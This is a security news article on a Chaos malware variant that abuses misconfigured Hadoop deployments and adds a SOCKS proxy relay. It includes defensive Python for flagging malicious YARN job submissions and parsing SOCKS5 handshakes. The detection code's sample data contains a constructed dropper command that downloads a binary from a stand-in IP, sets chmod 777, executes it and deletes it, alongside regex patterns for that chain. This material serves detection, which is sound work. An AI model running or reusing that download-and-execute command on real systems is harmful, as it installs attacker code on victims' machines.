Researchers have identified a new variant of the Chaos malware that is actively targeting misconfigured cloud environments. The shift reflects a broader trend of threat actors exploiting cloud misconfigurations, rather than software vulnerabilities, to extend their reach and operational capabilities.

According to Darktrace, the updated malware demonstrates a clear evolution in strategy. “Chaos malware is increasingly targeting misconfigured cloud deployments, expanding beyond its traditional focus on routers and edge devices,” the company stated in its latest report. This transition signals a broader and more sophisticated approach by cybercriminals to infiltrate enterprise infrastructure.

Originally documented by Lumen Black Lotus Labs in September 2022, Chaos has long been recognized as a cross-platform threat capable of infecting both Windows and Linux systems. Historically, it enabled attackers to execute remote shell commands, deploy additional payloads, brute-force SSH credentials, mine cryptocurrency, and launch distributed denial-of-service (DDoS) attacks using multiple protocols, including HTTP, TCP, UDP, TLS, and WebSocket.

However, the latest findings show that attackers are now using misconfigured Hadoop deployments for initial access. In the observed intrusion, the chain began with a malicious HTTP request that caused a rogue application to be created on the targeted cluster. Shell commands embedded in that application then downloaded a Chaos binary from a remote server, made it world-readable, world-writable and executable with "chmod 777," executed it, and removed traces of the download to hinder forensic analysis.
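The chain described above matches the well-known abuse of an unauthenticated Hadoop YARN ResourceManager REST API, where an application submission carries an attacker-chosen launch command; the article does not name that API, so treating the "malicious HTTP request" as a YARN application submission (POST /ws/v1/cluster/apps) is an assumption made here. The following Python is an added example, not code from the article or from Darktrace: it triages captured submission bodies (constructed samples, not real captures) for the fetch, chmod 777, execute, delete pattern and extracts the download URL as an indicator.

```python
import json
import re
from typing import Dict, List

# Constructed sample bodies in the shape of a YARN ResourceManager
# application-submission request. Mapping the article's "malicious HTTP
# request" to this API is an assumption; neither body is a real capture.
SAMPLE_SUBMISSIONS = [
    # Benign job: runs a script that already exists on the node.
    json.dumps({
        "application-id": "application_0000000000000_0001",
        "application-name": "nightly-etl",
        "am-container-spec": {"commands": {"command": "/opt/etl/run.sh --date today"}},
    }),
    # Dropper chain as described in the article: fetch, chmod 777, execute, delete.
    json.dumps({
        "application-id": "application_0000000000000_0002",
        "application-name": "hadoop",
        "am-container-spec": {"commands": {"command":
            "cd /tmp; curl -s http://203.0.113.10/x86_64 -o .x; chmod 777 .x; ./.x; rm -f .x"}},
    }),
]

# One regex per stage of the chain the article describes.
INDICATORS = {
    "remote_download": re.compile(r"\b(curl|wget)\b[^;&|]*https?://", re.I),
    "chmod_777": re.compile(r"\bchmod\s+777\b"),
    "temp_dir": re.compile(r"\bcd\s+/(tmp|dev/shm|var/tmp)\b"),
    "hidden_exec": re.compile(r"(^|[;&|]\s*)\./\.\S+"),
    "self_delete": re.compile(r"\brm\s+-\w*f\w*\s+\S+"),
}
URL_RE = re.compile(r"https?://[^\s;'\"&|]+", re.I)


def _load(body: str) -> Dict:
    """Parse a body as a JSON object; anything else becomes an empty dict."""
    try:
        doc = json.loads(body)
    except ValueError:
        return {}
    return doc if isinstance(doc, dict) else {}


def extract_command(body: str) -> str:
    """Pull the ApplicationMaster launch command out of a submission body."""
    commands = _load(body).get("am-container-spec", {}).get("commands", {})
    if isinstance(commands, dict):
        return str(commands.get("command", ""))
    if isinstance(commands, list):  # tolerate a list of commands
        return " ; ".join(str(c) for c in commands)
    return ""


def triage(body: str) -> Dict:
    """Score one submission body against the dropper-chain indicators."""
    command = extract_command(body)
    hits: List[str] = [name for name, rx in INDICATORS.items() if rx.search(command)]
    urls = URL_RE.findall(command)
    # A download followed by a 777 chmod or a hidden-file execution is enough on
    # its own; otherwise require three independent stages so that ordinary jobs
    # which merely clean up with rm are not flagged.
    suspicious = ("remote_download" in hits and
                  ("chmod_777" in hits or "hidden_exec" in hits)) or len(hits) >= 3
    return {"application-id": _load(body).get("application-id"), "command": command,
            "hits": hits, "urls": urls, "suspicious": suspicious}


def flagged_ids(bodies: List[str]) -> List[str]:
    """Application IDs of submissions that match the chain."""
    return [r["application-id"] for r in map(triage, bodies) if r["suspicious"]]


if __name__ == "__main__":
    for result in map(triage, SAMPLE_SUBMISSIONS):
        print(result["application-id"], result["suspicious"], result["hits"], result["urls"])
```

Run it over request bodies logged at a reverse proxy or WAF in front of the ResourceManager. The scoring is deliberately conservative; the actual fix is to keep the API off untrusted networks and require authentication, since a legitimately exposed submission endpoint is remote code execution by design.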

Notably, the domain used in this campaign has previously been linked to phishing operations conducted by the Chinese cybercrime group Silver Fox. That campaign, known as Operation Silk Lure and documented by Seqrite Labs, distributed decoy documents and ValleyRAT malware, suggesting a possible overlap in threat infrastructure.

Researchers also observed that the updated 64-bit ELF variant of Chaos introduces several functional changes. It drops earlier propagation techniques such as SSH brute-forcing and router exploitation, but adds a SOCKS proxy feature. Compromised hosts can then relay the operators' traffic, so that connections appear to originate from the victim rather than from the attacker, which masks the true source and complicates attribution and detection.
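The article reports the proxy feature but does not describe its wire format, so the following added example assumes the relay accepts standard SOCKS5 clients as specified in RFC 1928; that is an assumption, not something the article or Darktrace states, and the code is not the malware's or Darktrace's. It parses the client side of a SOCKS5 handshake from the first bytes of a captured TCP stream (constructed samples), so a defender can tell whether a server is accepting proxy requests it has no business accepting and where those requests were bound.

```python
import ipaddress
import struct
from typing import Dict, Optional

SOCKS_VERSION = 0x05
CMD_NAMES = {0x01: "CONNECT", 0x02: "BIND", 0x03: "UDP_ASSOCIATE"}
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04

# Constructed client-to-server bytes as they would appear in a capture:
# greeting offering only "no authentication", then CONNECT example.com:443.
SAMPLE_CLIENT_STREAM = b"\x05\x01\x00" + b"\x05\x01\x00\x03\x0bexample.com\x01\xbb"


def parse_socks5_greeting(data: bytes) -> Optional[Dict]:
    """VER NMETHODS METHODS... (RFC 1928 section 3). None if not SOCKS5."""
    if len(data) < 2 or data[0] != SOCKS_VERSION:
        return None
    nmethods = data[1]
    if nmethods == 0 or len(data) < 2 + nmethods:
        return None
    return {"methods": list(data[2:2 + nmethods]), "consumed": 2 + nmethods}


def parse_socks5_request(data: bytes) -> Optional[Dict]:
    """VER CMD RSV ATYP DST.ADDR DST.PORT (RFC 1928 section 4). None if malformed."""
    if len(data) < 4 or data[0] != SOCKS_VERSION or data[2] != 0x00:
        return None
    cmd, atyp, pos = data[1], data[3], 4
    if cmd not in CMD_NAMES:
        return None
    if atyp in (ATYP_IPV4, ATYP_IPV6):
        size = 4 if atyp == ATYP_IPV4 else 16
        if len(data) < pos + size:
            return None
        host = str(ipaddress.ip_address(data[pos:pos + size]))
        pos += size
    elif atyp == ATYP_DOMAIN:
        if len(data) < pos + 1:
            return None
        n = data[pos]
        if len(data) < pos + 1 + n:
            return None
        host = data[pos + 1:pos + 1 + n].decode("ascii", errors="replace")
        pos += 1 + n
    else:
        return None
    if len(data) < pos + 2:
        return None
    port = struct.unpack("!H", data[pos:pos + 2])[0]
    return {"cmd": CMD_NAMES[cmd], "host": host, "port": port, "consumed": pos + 2}


def classify_stream(client_bytes: bytes) -> Dict:
    """Decide whether the first client bytes of a stream are a SOCKS5 session
    and, if so, where the relay was asked to connect. Greeting and request are
    concatenated because only the client direction is inspected."""
    greeting = parse_socks5_greeting(client_bytes)
    if greeting is None:
        return {"socks5": False}
    request = parse_socks5_request(client_bytes[greeting["consumed"]:])
    if request is None:
        # A greeting alone is weak evidence: three bytes can occur by chance.
        return {"socks5": True, "auth_methods": greeting["methods"], "request": None}
    return {"socks5": True, "auth_methods": greeting["methods"],
            "request": request["cmd"],
            "destination": f"{request['host']}:{request['port']}"}


if __name__ == "__main__":
    print(classify_stream(SAMPLE_CLIENT_STREAM))
```

Feed it the first client-to-server bytes of flows that terminate on a listening port the server is not expected to serve; a greeting followed by a well-formed CONNECT to an unrelated host is a strong sign the machine is relaying someone else's traffic. Operators can also tunnel the proxy protocol inside the C2 channel, in which case this check sees nothing and the indicator is the unexplained outbound connection fan-out instead.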

Darktrace emphasized this evolution, stating, “In addition, several functions that were previously believed to be inherited from Kaiji have also been changed, suggesting that the threat actors have either rewritten the malware or refactored it extensively.” This indicates a deliberate effort to modernize the malware and adapt it to current cybercriminal demands.

Moreover, the inclusion of proxy capabilities points to a shift in monetization strategies. Beyond traditional DDoS attacks and crypto mining, attackers can now offer proxy-based services, further diversifying their illicit revenue streams. This aligns with broader trends seen in other botnets such as AISURU, which have also adopted similar features.

Concluding its findings, Darktrace warned, “While Chaos is not a new malware, its continued evolution highlights the dedication of cybercriminals to expand their botnets and enhance the capabilities at their disposal. The recent shift in botnets such as AISURU and Chaos to include proxy services as core features demonstrates that denial-of-service is no longer the only risk these botnets pose to organizations and their security teams.”

Overall, the development underscores the need for organizations to lock down cloud service configurations, in particular to keep management interfaces of data-platform components such as Hadoop off the public internet and behind authentication, and to monitor for threats that exploit infrastructure misconfigurations, including unexpected outbound connections that would indicate a host being used as a proxy.
